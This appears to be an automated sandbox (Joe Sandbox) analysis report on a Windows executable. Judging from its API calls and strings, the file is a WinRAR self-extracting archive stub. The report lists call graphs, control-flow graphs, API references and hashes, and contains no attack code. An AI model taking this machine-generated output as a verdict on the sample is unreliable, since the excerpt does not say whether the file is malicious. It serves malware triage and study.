GetFileType 25690->25691 25692 49b2b 25690->25692 25691->25692 25692->25519 25693 4237a 75 API calls 25692->25693 25693->25517 
25694->25519 25695->25520 25696->25536 25697->25536 25698->25542 25699->25536 25700->25536 25701->25536 25702->25549 25703->25551 25704->25559 25705->25550 25706->25480 25707->25480 25714 464f8 25708->25714 25710 4661c 25710->25639 25712 464f8 2 API calls 25712->25710 25713->25639 25715 46502 25714->25715 25717 465ea 25715->25717 25718 4c6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25715->25718 25717->25710 25717->25712 25718->25715 25719->25645 25720->25643 25721->25652 25722->25660 25723->25659 25739 5479d 25724->25739 25726 57ddd __InternalCxxFrameHandler 25726->25726 25728 581ee 25726->25728 25745 4e56c 25726->25745 25754 55001 133 API calls 25726->25754 25755 58243 133 API calls 25726->25755 25756 5229f 89 API calls 25726->25756 25757 524df 25726->25757 25761 54b0c 99 API calls __InternalCxxFrameHandler 25726->25761 25762 5889f 138 API calls __InternalCxxFrameHandler 25726->25762 25763 563a9 99 API calls __InternalCxxFrameHandler 25728->25763 25730 581fe __InternalCxxFrameHandler 25730->25664 25737->25664 25738->25664 25741 547a7 _abort __EH_prolog 25739->25741 25740 54892 25740->25726 25741->25740 25742 60013 41 API calls 25741->25742 25743 54829 _abort ___std_exception_copy 25741->25743 25742->25743 25743->25740 25764 4775a 76 API calls 25743->25764 25751 4e582 __InternalCxxFrameHandler 25745->25751 25746 4e6f2 25748 4e726 25746->25748 25765 4e523 25746->25765 25769 52121 25748->25769 25751->25746 25752 4e6e9 25751->25752 25775 4bff5 92 API calls __EH_prolog 25751->25775 25776 59c9d 118 API calls 25751->25776 25752->25726 25754->25726 25755->25726 25756->25726 25758 52516 25757->25758 25759 524eb ResetEvent ReleaseSemaphore 25757->25759 25758->25726 25787 522fc 80 API calls 25759->25787 25761->25726 25762->25726 25763->25730 25764->25743 25766 4e568 25765->25766 25767 4e52b 25765->25767 25766->25748 25767->25766 25777 52e58 25767->25777 25770 52128 25769->25770 25772 52143 25770->25772 25785 476e4 RaiseException CallUnexpected 25770->25785 25771 
52154 SetThreadExecutionState 25771->25752 25772->25771 25786 476e4 RaiseException CallUnexpected 25772->25786 25775->25751 25776->25751 25780 5eead 25777->25780 25781 515a3 25780->25781 25782 5eec4 SendDlgItemMessageW 25781->25782 25783 5c748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25782->25783 25784 52e78 25783->25784 25784->25766 25785->25772 25786->25771 25787->25758 25797 420ed 26 API calls Concurrency::cancel_current_task 25788->25797 25790 416c0 25792 4e34a Concurrency::cancel_current_task 25791->25792 25798 4bd8e 87 API calls Concurrency::cancel_current_task 25792->25798 25794 4e37c 25799 4bd8e 87 API calls Concurrency::cancel_current_task 25794->25799 25796 4e387 25797->25790 25798->25794 25799->25796 25800->25571 25802 4baa1 25801->25802 25803 4bb20 FindNextFileW 25802->25803 25804 4baba FindFirstFileW 25802->25804 25805 4bb2b GetLastError 25803->25805 25811 4bb02 25803->25811 25806 4bac9 25804->25806 25804->25811 25805->25811 25807 4cf32 GetCurrentDirectoryW 25806->25807 25808 4bad9 25807->25808 25809 4baf7 GetLastError 25808->25809 25810 4badd FindFirstFileW 25808->25810 25809->25811 25810->25809 25810->25811 25811->25401 25812->25325 25814 53540 25813->25814 25816 53560 Concurrency::cancel_current_task 25814->25816 25817 52206 25814->25817 25818 524df 82 API calls 25817->25818 25819 52228 ReleaseSemaphore 25818->25819 25820 52266 DeleteCriticalSection CloseHandle CloseHandle 25819->25820 25821 52248 25819->25821 25820->25816 25824 522fc 80 API calls 25821->25824 25823 52252 CloseHandle 25823->25820 25823->25821 25824->25823 25825->25172 25826->25178 25827->25178 25828->25181 25829->25187 25831 4b1d2 79 API calls 25830->25831 25832 4208f 25831->25832 25833 41ad3 116 API calls 25832->25833 25836 420ac 25832->25836 25834 4209c 25833->25834 25834->25836 25837 41397 75 API calls 25834->25837 25836->25195 25836->25196 25837->25836 25839 5ffc0 25838->25839 25840 4b4e0 GetFileAttributesW 25839->25840 25841 4b4f1 
25840->25841 25842 4b4ca 25840->25842 25843 4cf32 GetCurrentDirectoryW 25841->25843 25842->24977 25842->24991 25844 4b505 25843->25844 25844->25842 25845 4b509 GetFileAttributesW 25844->25845 25845->25842 25846->25215 25847->25216 25848->25218 25849->25229 26117 64bc0 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25857 4acd4 25858 4acde 25857->25858 25859 4ae2c SetFilePointer 25858->25859 25860 4acf4 25858->25860 25862 4aa7a 80 API calls 25858->25862 25863 4ae05 25858->25863 25859->25860 25861 4ae49 GetLastError 25859->25861 25861->25860 25862->25863 25863->25859 26077 5bdd0 74 API calls 26118 673d0 QueryPerformanceFrequency QueryPerformanceCounter 26078 5ede1 DialogBoxParamW 25874 6cce0 25875 6ccf2 25874->25875 25876 6cce9 25874->25876 25878 6cbd7 25876->25878 25879 6a505 _abort 38 API calls 25878->25879 25880 6cbe4 25879->25880 25898 6ccfe 25880->25898 25882 6cbec 25907 6c96b 25882->25907 25885 6cc03 25885->25875 25886 6a7ee __vsnwprintf_l 21 API calls 25887 6cc14 25886->25887 25888 6cc46 25887->25888 25914 6cda0 25887->25914 25891 6a65a _free 20 API calls 25888->25891 25891->25885 25892 6cc41 25924 6a7db 20 API calls __dosmaperr 25892->25924 25894 6cc8a 25894->25888 25925 6c841 26 API calls 25894->25925 25895 6cc5e 25895->25894 25896 6a65a _free 20 API calls 25895->25896 25896->25894 25899 6cd0a ___scrt_is_nonwritable_in_current_image 25898->25899 25900 6a505 _abort 38 API calls 25899->25900 25905 6cd14 25900->25905 25902 6cd98 _abort 25902->25882 25905->25902 25906 6a65a _free 20 API calls 25905->25906 25926 6a0e4 38 API calls _abort 25905->25926 25927 6bde1 EnterCriticalSection 25905->25927 25928 6cd8f LeaveCriticalSection _abort 25905->25928 25906->25905 25908 65934 __fassign 38 API calls 25907->25908 25909 6c97d 25908->25909 25910 6c99e 25909->25910 25911 6c98c GetOEMCP 25909->25911 25912 6c9a3 GetACP 25910->25912 25913 6c9b5 25910->25913 25911->25913 25912->25913 25913->25885 25913->25886 25915 6c96b 40 API calls 25914->25915 25916 
6cdbf 25915->25916 25918 6ce35 _abort 25916->25918 25920 6ce10 IsValidCodePage 25916->25920 25922 6cdc6 25916->25922 25917 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25919 6cc39 25917->25919 25929 6ca43 GetCPInfo 25918->25929 25919->25892 25919->25895 25921 6ce22 GetCPInfo 25920->25921 25920->25922 25921->25918 25921->25922 25922->25917 25924->25888 25925->25888 25927->25905 25928->25905 25930 6cb27 25929->25930 25935 6ca7d 25929->25935 25932 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25930->25932 25934 6cbd3 25932->25934 25934->25922 25939 6db38 25935->25939 25938 6bd28 __vsnwprintf_l 43 API calls 25938->25930 25940 65934 __fassign 38 API calls 25939->25940 25941 6db58 MultiByteToWideChar 25940->25941 25943 6db96 25941->25943 25951 6dc2e 25941->25951 25946 6a7ee __vsnwprintf_l 21 API calls 25943->25946 25949 6dbb7 _abort __vsnwprintf_l 25943->25949 25944 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25947 6cade 25944->25947 25945 6dc28 25958 6bd73 20 API calls _free 25945->25958 25946->25949 25953 6bd28 25947->25953 25949->25945 25950 6dbfc MultiByteToWideChar 25949->25950 25950->25945 25952 6dc18 GetStringTypeW 25950->25952 25951->25944 25952->25945 25954 65934 __fassign 38 API calls 25953->25954 25955 6bd3b 25954->25955 25959 6bb0b 25955->25959 25958->25951 25960 6bb26 __vsnwprintf_l 25959->25960 25961 6bb4c MultiByteToWideChar 25960->25961 25962 6bb76 25961->25962 25963 6bd00 25961->25963 25966 6a7ee __vsnwprintf_l 21 API calls 25962->25966 25968 6bb97 __vsnwprintf_l 25962->25968 25964 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25963->25964 25965 6bd13 25964->25965 25965->25938 25966->25968 25967 6bbe0 MultiByteToWideChar 25969 6bbf9 25967->25969 25982 6bc4c 25967->25982 25968->25967 25968->25982 25986 6c11c 25969->25986 25973 6bc23 25977 6c11c __vsnwprintf_l 11 API calls 25973->25977 25973->25982 25974 6bc5b 25975 6a7ee __vsnwprintf_l 21 API 
calls 25974->25975 25980 6bc7c __vsnwprintf_l 25974->25980 25975->25980 25976 6bcf1 25994 6bd73 20 API calls _free 25976->25994 25977->25982 25978 6c11c __vsnwprintf_l 11 API calls 25981 6bcd0 25978->25981 25980->25976 25980->25978 25981->25976 25983 6bcdf WideCharToMultiByte 25981->25983 25995 6bd73 20 API calls _free 25982->25995 25983->25976 25984 6bd1f 25983->25984 25996 6bd73 20 API calls _free 25984->25996 25987 6be48 _abort 5 API calls 25986->25987 25988 6c143 25987->25988 25991 6c14c 25988->25991 25997 6c1a4 10 API calls 3 library calls 25988->25997 25990 6c18c LCMapStringW 25990->25991 25992 60d6c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25991->25992 25993 6bc10 25992->25993 25993->25973 25993->25974 25993->25982 25994->25982 25995->25963 25996->25982 25997->25990 26052 610e0 LocalFree 26079 6d1e0 GetProcessHeap 26095 5c2e3 79 API calls 26080 605f0 27 API calls 26012 5eff2 26013 5efff 26012->26013 26014 4f937 53 API calls 26013->26014 26015 5f00c 26014->26015 26016 44a20 _swprintf 51 API calls 26015->26016 26017 5f021 SetDlgItemTextW 26016->26017 26018 5c748 5 API calls 26017->26018 26019 5f03e 26018->26019 26054 730f0 CloseHandle 26022 413fd 43 API calls 2 library calls 26097 52efb GetCPInfo IsDBCSLeadByte

    Control-flow Graph

    APIs
      • Part of subcall function 00051B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 00051B95
      • Part of subcall function 00051B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00051BA7
      • Part of subcall function 00051B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00051BD8
      • Part of subcall function 0005B64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005B655
      • Part of subcall function 0005BD0B: OleInitialize.OLE32(00000000), ref: 0005BD24
      • Part of subcall function 0005BD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD5B
      • Part of subcall function 0005BD0B: SHGetMalloc.SHELL32(0008A460), ref: 0005BD65
    • GetCommandLineW.KERNEL32 ref: 0005F08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005F0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 0005F0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 0005F117
      • Part of subcall function 0005ED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005ED34
      • Part of subcall function 0005ED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005ED70
      • Part of subcall function 0005074B: _wcslen.LIBCMT ref: 0005076F
    • CloseHandle.KERNEL32(00000000), ref: 0005F11E
    • GetModuleFileNameW.KERNEL32(00000000,000A0CC0,00000800), ref: 0005F138
    • SetEnvironmentVariableW.KERNEL32(sfxname,000A0CC0), ref: 0005F144
    • GetLocalTime.KERNEL32(?), ref: 0005F14F
    • _swprintf.LIBCMT ref: 0005F18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005F1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 0005F1AA
    • LoadIconW.USER32(00000000,00000064), ref: 0005F1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 0005F212
    • Sleep.KERNEL32(?), ref: 0005F240
    • DeleteObject.GDI32 ref: 0005F279
    • DeleteObject.GDI32(?), ref: 0005F289
    • CloseHandle.KERNEL32 ref: 0005F2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: 6a9c4460e9dede79e4ebdec28465f4a4d83083bb0d6e71f99e73f5b7dff45130
    • Instruction ID: f49b7e8014b3e5aad60dfee0f943f32f3a4064583b29592813cd5f31325bff26
    • Opcode Fuzzy Hash: 6a9c4460e9dede79e4ebdec28465f4a4d83083bb0d6e71f99e73f5b7dff45130
    • Instruction Fuzzy Hash: 9E61F671900701ABF710AB61EC49FBB7BECFB46746F04012AFA4592192DB7C9D48CB62

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 5b6c2-5b6df FindResourceW 702 5b6e5-5b6f6 SizeofResource 701->702 703 5b7db 701->703 702->703 704 5b6fc-5b70b LoadResource 702->704 705 5b7dd-5b7e1 703->705 704->703 706 5b711-5b71c LockResource 704->706 706->703 707 5b722-5b737 GlobalAlloc 706->707 708 5b7d3-5b7d9 707->708 709 5b73d-5b746 GlobalLock 707->709 708->705 710 5b7cc-5b7cd GlobalFree 709->710 711 5b74c-5b76a call 62db0 CreateStreamOnHGlobal 709->711 710->708 714 5b7c5-5b7c6 GlobalUnlock 711->714 715 5b76c-5b78e call 5b626 711->715 714->710 715->714 720 5b790-5b798 715->720 721 5b7b3-5b7c1 720->721 722 5b79a-5b7ae GdipCreateHBITMAPFromBitmap 720->722 721->714 722->721 723 5b7b0 722->723 723->721
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C91D,00000066), ref: 0005B6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B6EC
    • LoadResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B703
    • LockResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C91D,00000066), ref: 0005B72D
    • GlobalLock.KERNEL32(00000000), ref: 0005B73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005B762
    • GlobalUnlock.KERNEL32(00000000), ref: 0005B7C6
      • Part of subcall function 0005B626: GdipAlloc.GDIPLUS(00000010), ref: 0005B62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B7A7
    • GlobalFree.KERNEL32(00000000), ref: 0005B7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 3b0e13a5933ed60b23433a8bfd360cda6c00ddc24d3c657b41b870af5db797b2
    • Instruction ID: 2981f56844230afc6e70c68f98afbd1d5618c90b41cccf3ea33378dc70228679
    • Opcode Fuzzy Hash: 3b0e13a5933ed60b23433a8bfd360cda6c00ddc24d3c657b41b870af5db797b2
    • Instruction Fuzzy Hash: 8F317271604706AFE7119F21EC49D2B7FA8FF88792B050518FD09D2261EB39EC94CBA0

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 835 4ba94-4bab8 call 5ffc0 838 4bb20-4bb29 FindNextFileW 835->838 839 4baba-4bac7 FindFirstFileW 835->839 840 4bb3b-4bbf8 call 51928 call 4d71d call 52914 * 3 838->840 841 4bb2b-4bb39 GetLastError 838->841 839->840 842 4bac9-4badb call 4cf32 839->842 846 4bbfd-4bc0a 840->846 843 4bb12-4bb1b 841->843 850 4baf7-4bb00 GetLastError 842->850 851 4badd-4baf5 FindFirstFileW 842->851 843->846 853 4bb10 850->853 854 4bb02-4bb05 850->854 851->840 851->850 853->843 854->853 856 4bb07-4bb0a 854->856 856->853 858 4bb0c-4bb0e 856->858 858->843
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BABD
      • Part of subcall function 0004CF32: _wcslen.LIBCMT ref: 0004CF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BB21
    • GetLastError.KERNEL32(?,?,?,?,0004B98B,000000FF,?,?), ref: 0004BB2D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
    • Instruction ID: feee32e3e1cfef516e0b1a30b6f67f439eeeb35c19bcb7e693c04485da6b7b33
    • Opcode Fuzzy Hash: 72c754d398826fd2467236491f1ef1ec75e82bbb9fcb61c7e896f2e9e7648d50
    • Instruction Fuzzy Hash: 584162B2900519ABCB25DF64CC94AEEB3B8FF48350F1041A6E96DE3201D774AE94CF94
    APIs
    • CLSIDFromString.COMBASE(?,?), ref: 0005B0CF
    • CoCreateInstance.COMBASE(?,00000000,00000005,000764FC,?), ref: 0005B0E6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateFromInstanceString
    • String ID: Pzv
    • API String ID: 432265043-4092170144
    • Opcode ID: bd56a3104036981c1ce6a98cee8fc6eee5250e1a33de4f7308af46af4826bf1e
    • Instruction ID: 46a0ac9e808f840d09caeff70e74360f638fc1f2d07f6a477b47271a23058c56
    • Opcode Fuzzy Hash: bd56a3104036981c1ce6a98cee8fc6eee5250e1a33de4f7308af46af4826bf1e
    • Instruction Fuzzy Hash: 30213C75A00514EFEB44DF68CC58D5E7BB8EF48705B000059FA06E7261CB79AD42CF90
    APIs
    • __EH_prolog.LIBCMT ref: 000492CB
      • Part of subcall function 0004D656: _wcsrchr.LIBVCRUNTIME ref: 0004D660
      • Part of subcall function 0004CAA0: _wcslen.LIBCMT ref: 0004CAA6
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B5E2
      • Part of subcall function 0004B5D6: __aulldiv.LIBCMT ref: 0004B60E
      • Part of subcall function 0004B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0004B615
      • Part of subcall function 0004B5D6: _swprintf.LIBCMT ref: 0004B640
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B64A
      • Part of subcall function 0004B5D6: _swprintf.LIBCMT ref: 0004B6A0
      • Part of subcall function 0004B5D6: _wcslen.LIBCMT ref: 0004B6AA
      • Part of subcall function 00044727: __EH_prolog.LIBCMT ref: 0004472C
      • Part of subcall function 0004A212: __EH_prolog.LIBCMT ref: 0004A217
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    • __tmp_reference_source_, xrefs: 00049596
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
    • Opcode ID: b6bed20682c164b1411bbe9510bbf15a790d0ae858cb0c71774eaf90d0b5c1fb
    • Instruction ID: 13c8aec82a6ffa3c50262f6ab9bcdf11b9ef730bca3610cad084de4b8748afc9
    • Opcode Fuzzy Hash: b6bed20682c164b1411bbe9510bbf15a790d0ae858cb0c71774eaf90d0b5c1fb
    • Instruction Fuzzy Hash: 55A208B0A04245AEDF65DF64C895BEF7BF4BF05300F0841B9E9499B183D7349A48CBA9
    APIs
    • GetCurrentProcess.KERNEL32(00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002,00000000), ref: 000691C1
    • TerminateProcess.KERNEL32(00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002,00000000), ref: 000691C8
    • ExitProcess.KERNEL32 ref: 000691DA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Process$CurrentExitTerminate
    • String ID:
    • API String ID: 1703294689-0
    • Opcode ID: dc6774495eab2cb99e0ba52e3e3465a3abb94c453895d99767374c456d69ffb1
    • Instruction ID: 32e9b16080ed20c9438df56f5e01c366bdaae32e3ceac0b9a6b86b04e52bc850
    • Opcode Fuzzy Hash: dc6774495eab2cb99e0ba52e3e3465a3abb94c453895d99767374c456d69ffb1
    • Instruction Fuzzy Hash: 60E0B636404549EBDF116F64DD09AA83B6BEB51341B114414F9099A532CB3DEE82CA90
    APIs
    • SetWindowLongW.USER32(?,000000EB), ref: 0005B098
    • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0005B0B3
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Window$LongNtdllProc_
    • String ID:
    • API String ID: 2044268144-0
    • Opcode ID: c75823751a312d49313ed8fc0c8fe2f98cab726184dfd390407dc967408601db
    • Instruction ID: 4f63747c59988327ac67038682c4aecb3dfa3c3d69191a5abe543a8b6e08239e
    • Opcode Fuzzy Hash: c75823751a312d49313ed8fc0c8fe2f98cab726184dfd390407dc967408601db
    • Instruction Fuzzy Hash: 61E0E536200518BB8F119F99DD08C9F3F69FF8A771B008111F9195A161C771A962EBA0
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: ed49a3125a1d4e48d86fa620310d82cdcc1156d70c5a8d493c8d8ca29e827784
    • Instruction ID: 533709a8505b80f37b79069c27b86895d1710abfea7f9476e08a822fddc312d5
    • Opcode Fuzzy Hash: ed49a3125a1d4e48d86fa620310d82cdcc1156d70c5a8d493c8d8ca29e827784
    • Instruction Fuzzy Hash: 43D194B16087448FDB24CF28D84479BBBE5BF89309F04456DEC89A7242D734ED49CB5A
    APIs
    • __EH_prolog.LIBCMT ref: 0005C9C5
